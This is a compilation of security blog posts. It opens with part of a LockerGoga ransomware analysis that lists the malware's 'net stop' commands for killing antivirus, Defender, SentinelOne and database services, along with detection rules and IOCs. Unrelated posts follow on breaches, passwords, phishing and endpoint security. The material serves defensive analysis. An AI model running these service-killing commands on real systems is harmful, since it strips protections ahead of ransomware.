net stop SQLAgent$CXDB /y net stop mfefire /y
net stop SQLAgent$CITRIX_METAFRAME /y net stop “SQL Backups” /y net stop “avast! Antivirus” /y
net stop MSSQL$PROD /y net stop aswBcc /y
net stop “Zoolz 2 Service” /y net stop “Avast Business Console Client Antivirus Service” /y
net stop MSSQLServerADHelper /y net stop mfewc /y
net stop SQLAgent$PROD /y net stop Telemetryserver /y
net stop msftesql$PROD /y net stop WdNisSvc /y
net stop WinDefend /y net stop EPUpdateService /y
net stop MCAFEETOMCATSRV530 /y net stop TmPfw /y
net stop MCAFEEEVENTPARSERSRV /y net stop SentinelAgent /y
net stop MSSQLFDLauncher$ITRIS /y net stop SentinelHelperService /y
net stop MSSQL$EPOSERVER /y net stop LogProcessorService /y
net stop MSSQL$ITRIS /y net stop EPUpdateService /y
net stop SQLAgent$EPOSERVER /y net stop TmPfw /y
net stop SQLAgent$ITRIS /y net stop SentinelAgent /y
net stop SQLTELEMETRY$ITRIS /y net stop SentinelHelperService /y
net stop MsDtsServer130 /y net stop LogProcessorService /y
net stop SSISTELEMETRY130 /y net stop EPUpdateService /y
net stop MSSQLLaunchpad$ITRIS /y net stop TmPfw /y
net stop BITS /y net stop SentinelAgent /y
net stop BrokerInfrastructure /y net stop EPProtectedService /y
net stop epag /y net stop epredline /y
net stop EPIntegrationService /y net stop EPSecurityService /y

New ransomware, new features, but still room to improve

We will continue tracking LockerGoga, but we have already seen some interesting features never seen before, such as parallel tasking encrypting the system or log files for debugger purposes. We did not see any spreading method used to deliver LockerGoga so it would be fair to assume it is used in targeted campaigns after the attackers had access to the system. At the time of this analysis, all the samples are not packed, or have complex methods of protection from being executed inside a sandbox system, though this could change in the near future.

Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and also ciphering itself during the process, causing a crash:

We expect all these errors will be fixed with further development of the malware.

Observations:

The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.

In the case of LockerGoga we can observe the following in:

  • Sectigo as a certificate, also used to digitally sign the certificate
  • Ransom note slightly modified from Ryuk Ransomware
  • Specific FileMarker used to flag the encrypted files
  • No BTC address used in the ransom note, meaning victims must make contact directly by email, something that we have seen elsewhere in our latest investigations.

MITRE ATT&CK Coverage:

Hooking

Kernel Modules and Extensions

Process Injection

Code Signing

Query Registry

Process Discovery

Data Compressed

McAfee coverage:

Detection names: 

RansomCLock-FAL!A5BC1F94E750

Ransom-Goga!E11502659F6B

Trojan-Ransom

Ransom-Goga!438EBEC995AD

Trojan-FQSS!3B200C8173A9

RansomCLock-FAL!A1D732AA27E1

Ransom-Goga!C2DA604A2A46

Ransom-O

Trojan-FPYT!BA53D8910EC3

Ransom-FQPT!FAF4DE4E1C5D

RansomCLock-FAL!3EBCA21B1D4E

RansomCLock-FAL!E8C7C902BCB2

Ransom-Goga!E11502659F6B

Generic.bvg

Ransom-Goga!16BCC3B7F32C

Expert Rules

The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:

Rule {

Process {

Include OBJECT_NAME { -v “SYSTEM:REMOTE” }

}

Target {

Match FILE {

Include OBJECT_NAME { -v “c:\\windows\\temp\\*.exe” }

Include OBJECT_NAME { -v “c:\\windows\\temp\\*.bat” }

Include -access “CREATE”

}

}

}

Rule {

Process {

Include OBJECT_NAME { -v “WmiPrvSE.exe” }

}

Target {

Match PROCESS {

Include OBJECT_NAME { -v “cmd.exe”}

Include -access “CREATE”

}

}

}

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

Prescriptive guidance

It is advisable for customers to undertake appropriate risk assessment to determine if this threat has a high probability of targeting their environments.  Whilst the above detailed known samples are incorporated within McAfee technologies, customers can also add the following Access Protection rules to prevent the creation of encrypted files on the victim host:

Executables:

  • Inclusion Status: Include
  • File Name or Path: *
  • SubRule:

SubRule:

  • Type: File
  • Operations: Create
  • Targets:
    • Target 1:
      • Include
      • Files: *.locked
    • Target 2:
      • Include
      • Destination file: *.locked

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

  • File/Folder Access Protection Rule: Processes tInclude: *
  • File or folder name tblock: *.locked
  • File actions tprevent: New files being create

Access Protection Rules:

Customers can also add Access Protection rules matching these characteristics: Prevent Creation\Execution of:

  • c:\windows\temp\x??.bat
  • c:\windows\temp\kill.bat
  • c:\windows\temp\taskhost.exe

Prevent execution of binaries signed with SN:

  • C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell,
  • O=MIKL LIMITED, CN=MIKL LIMITED
  • C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent
  • Garden, O=ALISA LTD, CN=ALISA LTD
  • C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road,
  • O=KITTY’S LTD, CN=KITTY’S LTD

YARA RULE

We have a YARA rule available on our ATR github repository:

IOCs

a52f26575556d3c4eccd3b51265cb4e6

ba53d8910ec3e46864c3c86ebd628796

c2da604a2a469b1075e20c5a52ad3317

7e3f8b6b7ac0565bfcbf0a1e3e6fcfbc

3b200c8173a92c94441cb062d38012f6

438ebec995ad8e05a0cea2e409bfd488

16bcc3b7f32c41e7c7222bf37fe39fe6

e11502659f6b5c5bd9f78f534bc38fea

9cad8641ac79688e09c5fa350aef2094

164f72dfb729ca1e15f99d456b7cf811

52340664fe59e030790c48b66924b5bd

174e3d9c7b0380dd7576187c715c4681

3ebca21b1d4e2f482b3eda6634e89211

a1d732aa27e1ca2ae45a189451419ed5

e8c7c902bcb2191630e10a80ddf9d5de

4da135516f3da1c6ca04d17f83b99e65

a5bc1f94e7505a2e73c866551f7996f9

b3d3da12ca3b9efd042953caa6c3b8cd

faf4de4e1c5d8e4241088c90cfe8eddd

dece7ebb578772e466d3ecae5e2917f9

MayarChenot@protonmail[.]com

DharmaParrack@protonmail[.]com

wyattpettigrew8922555@mail[.]com

SayanWalsworth96@protonmail[.]com

SuzuMcpherson@protonmail[.]com

AbbsChevis@protonmail[.]com

QicifomuEjijika@o2[.]pl

RezawyreEdipi1998@o2[.]pl

AsuxidOruraep1999@o2[.]pl

IjuqodiSunovib98@o2[.]pl

aperywsqaroci@o2[.]pl

abbschevis@protonmail[.]com

asuxidoruraep1999@o2[.]pl

cottleakela@protonmail[.]com

couwetizotofo@o2[.]pl

dharmaparrack@protonmail[.]com

dutyuenugev89@o2[.]pl

phanthavongsaneveyah@protonmail[.]com

mayarchenot@protonmail[.]com

ijuqodisunovib98@o2[.]pl

qicifomuejijika@o2[.]pl

rezawyreedipi1998@o2[.]pl

qyavauzehyco1994@o2[.]pl

romanchukeyla@protonmail[.]com

sayanwalsworth96@protonmail[.]com

schreibereleonora@protonmail[.]com

suzumcpherson@protonmail[.]com

wyattpettigrew8922555@mail[.]com

The post LockerGoga Ransomware Family Used in Targeted Attacks appeared first on McAfee Blogs.

Docker Hub Database Breached, As Many As 190,000 Accounts Affected

Veracode Container Security Docker Breach April 2019

Docker, a company that created an open platform for building and running distributed applications, reported to users that its Docker Hub database had been breached, exposing sensitive data from approximately 190,000 accounts. While that figure makes up less than five percent of Hub users, the data included some usernames and hashed passwords as well as Github and Bitbucket tokens for Docker autobuild. The company reported that the tokens have been revoked, and said it “acted quickly to intervene and secure the site.”

Experts who spoke with Motherboard indicated that the worst-case scenario is that hackers gain access to proprietary source code of some of those accounts. For context, companies on Docker’s roster include the likes of Paypal and Visa. Microsoft quickly reported that its official files hosted in Docker Hub were not compromised.

According to Veracode CTO Chris Wysopal, it is not yet known what the underlying vulnerability was at Docker Hub, but it is a serious breach as attackers could use the access tokens to get at a company’s source code. It is unclear if the attackers would have write privileges, which would enable backdooring into the code. Wysopal said each customer that was notified should be resetting access tokens and looking at logs for access. With revision control, this is all heavily audited.

Since Docker notified customers quickly, hopefully the impact is limited. The company emailed those impacted by the breach directly with a password reset link. Customers using autobuilds should check to ensure that their GitHub or Bitbucket repositories are still linked to the Docker Hub to ensure autobuilds work correctly moving forward.

Thousands of companies and millions of developers around the world use Docker to run containers, which are software packages that include code, runtime, settings, system libraries, and system tools. By isolating software from its surroundings, software containers enable code to always run the same regardless of the environment it is operating within. Although the company is still investigating the breach, if hackers have access to the private code in the repositories, they may be able to inject malicious code into software autobuilt by Docker.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

strong password

strong passwordAs adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why it needs to become a habit much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank, and credit card accounts, apply for a loan or utility service or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control, the ability to practice and teach healthy password habits in our home.

Tips for Families

strong passwordShake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime
Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.

strong password

Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication ). MFA confirms a user’s identity only after presenting two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents, is recommended).

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

What Is Fix Rate, and Why Does It Matter?

Once your application security program is up and running, there are several metrics you can use to gauge your progress and optimize your program. For instance, companies typically measure their scan activity, flaw density, and policy compliance. However, very few include metrics for fix rate, despite the fact that it is an important indicator of a program’s success. Fix rate indicates how long it takes for a team to fix the vulnerabilities their scans find. Fix rate is calculated as follows:

Fix Rate = Fixed Flaws divided by (Fixed + Open Flaws)

Looking at fix rate over time measures the average velocity at which organizations are fixing flaws.

All the metrics mentioned above are important, but fix rate is especially critical. Ultimately, the most important function of an application security program effectively fixing flaws once they are discovered. In the end, you can’t scan your way to secure code.

What are the average fix rates?

For our most recent State of Software Security (SoSS) report, we analyzed the data compiled from the 700,000 scans we performed over a 12-month period between April 1, 2017 and March 31, 2018, and this reveals a pretty clear picture of the current state of fix rates.

When we look at the curve for the average fix velocity from the first day of discovery, we see that it takes organizations a troubling amount of time to address most of their flaws. One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven’t even made it halfway, closing only a little more than 45 percent of all flaws.

When we looked at fix rate by flaw type, we found that organizations are making a big push to fix their highest severity vulnerabilities first. Organizations managed to reach closure on 75 percent of these high-severity flaws more than 100 days sooner than the norm.

But the numbers aren’t so positive for other vulnerability rankings, such as exploitability or business criticality.

Why are fix rates important?

Speed matters when it comes to application security. The time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. Letting known vulnerabilities linger unfixed dramatically increases your risk. For instance, it was merely days between disclosure and exploitation of the vulnerability in the Apache Struts framework that led to the Equifax breach.

In addition, it’s important to address the most high-risk vulnerabilities the fastest. Our SoSS stats surrounding fix rate by flaw type (mentioned above) are important here. The fact that most organizations are solely focused on fixing high-severity flaws, but have troubling fix rates for flaws that are highly exploitable or business critical is problematic. Oftentimes, a low-severity flaw could be just as risky, if not more so, than a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How can we improve our fix rate?

Here are some ways to give your fix rate a boost:

Prioritize more

Reconsider your application security policy to ensure you are taking steps to reduce your most high-risk vulnerabilities the fastest. The sheer volume of open flaws within enterprise applications is too staggering to tackle at once -- which means that organizations need to find effective ways to prioritize which flaws they fix first.

For instance, not all apps are created equal, so create different requirements for different apps. An application that has IP, is public facing, and has third-party components may require all medium to very critical flaws to be fixed. A one-page temporary marketing site may only require high/very high flaws to be fixed.

In addition, consider a flaw’s exploitability, not just its severity. As noted above, some low-severity flaws could be highly exploitable, while some high-severity flaws would never be exploitable.

Scan more

This year’s State of Software Security report also revealed that those organizations that scan most frequently have the highest fix rates. Our data shows that there is a very strong correlation between how many times a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they’re able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Prevent more

The less flaws you have to tackle, the faster you can tackle them. If developers have the secure coding skills needed to avoid introducing flaws in the first place, they will put a big dent in the work needed to fix flaws later in the cycle. But most developers have had zero training on secure coding – either in school or on the job. Our research has shown that when developers do get training or coaching on secure coding, the organization’s fix rate gets a big boost. When our customers offer eLearning on secure coding for their development team, they improve their fix rate by 19 percent. When they take advantage of remediation coaching, they improve it by a whopping 88 percent.

Learn more

There’s more to AppSec than scanning. Get details in our new eBook, Application Security: Beyond Scanning.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

The Cybersecurity Dangers of the Dark Web and How to Protect Your Organization

English

Even as its top marketplace, Dream Market, prepares to close its doors, the dark web continues to thrive. In fact, Darkode, one of the most well-known hacking forums and black markets, has recently reopened. And what are some of the most common wares at these underground markets? Organizational data, and the tools needed to get more. As long as the dark web exists, organizations must learn more about the threat they pose, and how to protect themselves.

A One Stop Shop for Cyber Attack Tools

There are any number of ways attackers can use the dark web to find what they need to attack an organization. One of the most common items is ransomware, which has become worryingly affordable. For less than $1000, anyone can buy a malware strain that can be used again and again. While individuals are frequently ransomed, organizations are naturally a much more lucrative target. In fact, ransoms for organizations are rapidly increasing, with the average payment per incident going from around $7,000 in the final quarter of 2018 to almost $13,000 in the first quarter of 2019. 

The marketplace isn’t limited to digital purchases. Interested parties can also buy physical means of attack like credit card skimmers or USB drives loaded with malware. Recently, a former student managed to destroy 59 computers at a small college in New York in a single evening using a “USB Killer,” a USB thumb drive that discharges electrical current to fry any device to which it is connected. Though the “USB Killer” is shockingly legal to buy, such an item or similar is also available on the dark web to those who don’t want their purchase to be tracked. Such physical items would be particularly effective in the hands of a malicious insider who has access to workstations and servers.

The dark web is also a refuge for those who are inexperienced in digital attacks. Thousands of fraud guides are available to those eager to learn more about multiple different types of attacks like phishing, brute force, or even simple account takeovers. These guides are incredibly cheap, typically only running someone five to ten dollars. Hacking services are also readily available. The recent reopened Darkode, mentioned earlier, specializes in customized hacking jobs, as well as providing simpler services like renting a botnet to mount a DDoS attack.

An Underground Marketplace to Sell Your Breach Bounty

The goal for many types of malware is breaching systems to steal data. Attackers can utilize stolen credentials to use for themselves to commit identity fraud. However, oftentimes these breaches are so large that the amount of data stolen is more than an individual could use in a lifetime. Selling these credentials is even more lucrative than using the data for themselves. The dark web is the most natural and best place to sell these records. A hacker known as Gnosticsplayers has posted hundreds of millions of accounts for sale on the dark web, earning thousands of dollars in bitcoin.

Usernames and passwords are far from the only thing for sale. The dark web has someone’s entire identity for sale, from social security numbers to bank account numbers. For example, old tax returns stolen from accounting and legal firms are readily available for next to nothing. An old W2 can cost a few dollars or less, and makes it possible to file fraudulent returns, open accounts, and other identity scams.

Stolen information isn’t limited to human identities, either. Hackers are now trafficking in digital trust and machine identities as well, selling data like SSL and TLS certificates, which can be used to commit a number of different types of attacks. As more and more types of data come up for sale, the less confidence organizations and users can have in the security of the internet at large.

Not for Sale: Keeping Data Off the Dark Marketplace

With seemingly endless ways to perpetrate attacks, and a ready-made spot to sell the bounty of these attacks, it’s easy to feel daunted at the prospect of how to put up defenses. However, there are plenty of ways for your organization to prevent or remediate any threats from the dark web. 

Just as you keep locks on every door and window to your house, so should you protect every endpoint in your organization. While antivirus on workstations is routine, a high priority should also be placed on server specific, native antivirus for your servers, which are the key storage areas data attackers and threat actors are eager to exploit. Internet of Things (IoT) devices are becoming commonplace to the workplace, but preventative security specific to such devices is difficult to find. Given the prevalence of botnets on the dark web, it’s critical to ensure that your smart device is not part of such a network. Advanced threat detection solutions are the best way to find out if any IoT device, be it tablet or MRI machine, is infected with malware or being used for malicious purposes.

Insider threats should also be strongly considered when evaluating solutions. Insiders naturally have more access to data, and a simple purchase from the dark web could devastate an organization without proper monitoring and controls. Security solutions that enforce least privilege and detect anomalies within an organization can help defend against insider threats.

Monitoring can be provided by SIEM solutions, which filter numerous data sources and provide helpful insights through normalization and correlation. They can also identify suspicious behavior inside and outside of your organization   through real-time updates, threat prioritization, and reducing the number of interfaces in need of monitoring.

Control can be achieved with Identity and access management (IAM) solutions, which enable a robust approach to managing and governing access by utilizing the principle of least privilege, which highlights granting users only the access they need, when and how they need it. Employees require some access to complete their job, but not universal access, which can be all too tempting to exploit.

Finally, what better way to prevent being attacked than by thinking like the attackers? Penetration tests utilize ethical hacking to safely exploit security vulnerabilities, providing organizations insight and enabling remediation before an attack ever takes place. Regular penetration testing keeps organizations up to date on the latest strategies and tactics used by threat actors and the tools they provide on the dark web. Threat actors thrive in environments where individuals and organizations remain ignorant, hoping that their fear will overwhelm them into inaction. Staying vigilant and being proactive about building a strong security portfolio to set up barriers to your data is the best way to keep your information safe in their databases, and off the dark web.

cs-dark-web-blog-resize 2.jpg

Actionable Insight Identity and Access Management Network Insight Penetration testing
Big text: 
Blog
Resource type: 
Blogs
Interested in learning more?

See how these solutions will work for your specific IT environment by seeing them in action. Request a personalized demo from one of our experts today.

Effective Endpoint Security Strategy 101

Every organization wants to expedite processes, reduce costs, and bolster their staff. And in today’s modern digital world, these objectives are largely attainable, but can occasionally come with some unwarranted side effects. With all the devices an organization uses to achieve its business’ goals, things can occasionally get lost in the shuffle, and cybersecurity issues can emerge as a result. Balancing your business’ objectives while ensuring your organization’s data is secure can be a challenge for many. But that challenge can be assuaged by addressing cyberthreats at the start – the endpoint. Adopting an effective endpoint protection strategy is crucial for a modern-day organization and defines a strong security posture. In fact, the importance of endpoint security has even caught the eye of venture capitalist firms, who are investing billions a year in the cybersecurity sector. But what exactly are the components of a successful endpoint security strategy? Let’s break it down.

Ensure the Basics Are in Place

If there’s one thing my previous experience with consumer security has taught me, it’s that the proliferation of connected devices is showing no signs of slowing. The same goes for the connected devices leveraged by businesses day in and day out. Organizations often give multiple devices to their workers that will be used to communicate and contain crucial business-specific information. These devices are used by employees that go just about anywhere and do just about everything, so it’s important businesses equip their people with the tools they need to protect these devices and the data they safehouse.

The first important tool – VPNs, or Virtual Private Networks. The modern workforce is a mobile one, and professionals everywhere are carrying their devices with them as they travel and connect to public Wi-Fi networks. Public Wi-Fi networks are not typically the most secure, and VPNs can help ensure those mobile devices connect securely to avoid potentially exposing data.

These devices should always have strong authentication as well, which acts as the first line of defense for any security issues that arise. Remind everyone that their devices should be locked with a strong and complex password that acts as the gatekeeper for their device. That way, the company will be protected if that individual endpoint device becomes lost or stolen.

Empower Your Employees to Do Their Part

One of the most important tools to equip your employees with is proper security training. In order to keep endpoint devices safe and networks secure, employees should undergo regular security training sessions. This training should keep everyone up-to-date on the latest threats, the necessary precautions they need to take when browsing the web, and how their individual devices can impact an organization’s network.

One main point to hit upon during employee security training – the importance of updates. Updating your device software can feel like a menial task, but the gravitas behind the ask cannot be understated. Outdated software was the cause of the WannaCry global cyberattack and will be a differentiator moving forward for when attacks do come after individual endpoint devices.

Make Predictive Technology an Essential

Now, in order to anticipate major cyberattacks like WannaCry, adopting predictive technology for your endpoint security strategy is of the utmost importance, as these innovations can be used to guide your incident response strategy. Take it from hundreds of IT professionals, who in a recent SANS survey expressed that predictive technologies – such as machine learning (ML) and artificial intelligence (AI) – are required in order to go from already knowing bad elements to focusing on identification of abnormal behavior.

ML and AI technology are also particularly crucial for visibility. This technology can empower security teams to gain insight into their endpoint detection and response systems, which automatically reduces the time required to address threats. Therefore, businesses need to have this predictive technology in place to anticipate and quickly gain insight into all threats affecting their organization’s network.

Adopt Innovative Technology

For those unsure where to start when it comes to AI and ML, there’s good news – there are actually endpoint security solutions out there that have predictive technology included in their build. Solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices.

Innovative solutions such as these will act as the cherry on top of your endpoint security strategy. So, it is crucial to take the time to invest in the right technology, irrespective of the nature of your enterprise. By creating the right combination of process and product, your organization’s network will be secure, and you won’t have to pick between business growth and a healthy security posture.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper: Five Ways to Rethink Your Endpoint Protection Strategy.

The post Effective Endpoint Security Strategy 101 appeared first on McAfee Blogs.

Veracode Is Named a Leader for Sixth Time in Gartner Magic Quadrant for Application Security Testing

Veracode has been named a Leader in the Gartner Inc. 2019 Magic Quadrant for Application Security Testing, marking our sixth year as a Leader.

We’re excited to again be recognized as a Leader in the industry. We believe Gartner continues to place Veracode in this position because of our vision in application security testing and our ability to cover the entire software development lifecycle (SDLC), from code to deployment, with services and support that help development teams with challenges, and a new analytics engine that shows performance in real-time.

It has been an incredible start to the year – customers are scanning more applications than ever before with Veracode, and are achieving unprecedented results with their AppSec programs. We’re dedicated to helping companies achieve a frictionless SDLC in which security and development teams work in collaboration without slowing down business outcomes.

The AppSec market is growing at a rapid pace, and far more quickly than other security sectors.

The report’s authors, Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, state in the report: "Through 2022, the AST market is projected to have a 10% compound annual growth rate (CAGR). This continues to be a fast-growing segment in the information security space, which itself is expected to grow at at five-year CAGR of 9%. The AST market size is estimated to reach $1.15 billion by the end of 2019."1

It’s not difficult to understand why – 111 billion lines of new code are written each year, a figure that will only go up because software powers the world around us. And that software is constantly being updated, and must be kept secure to prevent vulnerabilities from being exploited by both sophisticated and simplistic attacks. A new layer of complexity arises when you take into account compliance with privacy laws such as GDPR and PCI that seek to ensure companies have policies and practices in place to protect data.

Companies across industries are changing how they create and use software, seeking a competitive edge by taking modern approaches such as DevSecOps, Agile, microservices, cloud native apps, and APIs. However, these changes mean that organizations face even greater challenges to secure software that is being created rapidly and in new environments.

Veracode has redoubled its efforts to bring innovative products to customers to help them not only meet the challenges they encounter, but also to make secure software one of the reasons they are emboldened to change the world. Our solutions are designed for developers to excel at their jobs while coding securely.

We recently enhanced our platform with accelerated dynamic application security testing (DAST) using a new scalable architectural approach that allows for seamless deployment. With Veracode DAST, customers can easily configure to scan internal applications in the cloud, within containers, on a virtual machine or bare metal; customize scans for organizational compliance; and scan multiple applications using a single endpoint.

In addition, our focus on developer needs remains a core value at Veracode:

  • Veracode’s Software Composition Analysis (SCA) offering currently covers more than 1.9 million different and unique open source libraries, and almost 17.3 million different versions of those libraries.
  • Veracode Greenlight finds security defects in your code in seconds so you can fix findings directly in the IDE.
  • We support more than 100 languages and frameworks, including support for Go, Scala, and Python.

The thinking around software security is changing – is your company changing with it?

To download the 2019 Gartner Magic Quadrant for Application Security Testing, please visit here.

1. Gartner, Inc.  “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, April 18, 2019.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets

Codicil to Add to your Will – Disposal of Your Digital Assets

We were still in shock over the sudden demise of a dear family friend. But the bereaved family had no time for grieving. The gentleman had not left any will and no one had any clear idea about his financial and physical assets. The family was running from pillar to post, trying to sort out the mess.

Tomorrow, you and I will go meet our lawyer and find out how to draw up our will. I want us to leave everything in order, with specific instructions, so that there are no complications for the kids later,” announced my spouse one fine morning.

I readily agreed; however, I had a question.

OK, but what about our digital assets?”

The spouse looked confused and so I continued, “Shouldn’t we also make arrangements for how we want our digital assets to be handled post our decease?”

Most of us in the age group of 40-60 years are active in the digital world in a big way, with multiple online accounts- from social media, banking, travel booking, trading, e-mail, e-transaction to blogs, e-wallets and home service. We share personal photos and videos online. We also deal with virtual currency, the records of which are stored online. The sum of all this digital data is loosely termed as our digital asset.

You may wonder what’s the big deal about a will for digital assets as some may not even have any monetary value. Well, it will help in identifying your legal successor who can take decisions about your online accounts. Otherwise, your beneficiaries will have to run around searching for passwords, filling up forms, submitting requests at various places and so on. Secondly, your families need to know about any outstanding bills you may have received via email or credit card program, or financial payments due to you.
A will outlining usernames and passwords for all accounts and detailing what you want to be done with your digital asset will make it easier for your beneficiaries to take the right actions. Also, it will allow your family to continue receiving the payments from your online investments, or even payment from your blog site!

Prepare ahead

You can take any of these three steps:

a- Explain to your family about all your online accounts and passwords

b- Write down all details in a diary and keep it where it can be easily found

c- Create a will outlining your wishes and specifications regarding your digital assets

The first two options call for sharing passwords beforehand, something that you may not be comfortable with. So, the  third option is the best available. Go for it and your dear ones will bless you for your foresight.

Be proactive about your online presence

  • There may be content on your accounts you would not want others to see- We may create or download content that we would like to keep private. The best thing to do is to regularly sanitize accounts and delete what you don’t want others to see.
  • Inactive accounts and profiles are much in demand– cyber criminals want access to inactive accounts to create false IDs and fake profiles. They can also create problems for friends and families of the users.

While most of our generation limits themselves to a handful of social media accounts, below are a few handy guidelines to securing key social media accounts –

Facebook

The social media giant allows you to appoint a legal heir who can either opt to memorialize the account or delete it permanently. They will not offer login information to the family though.

Instagram

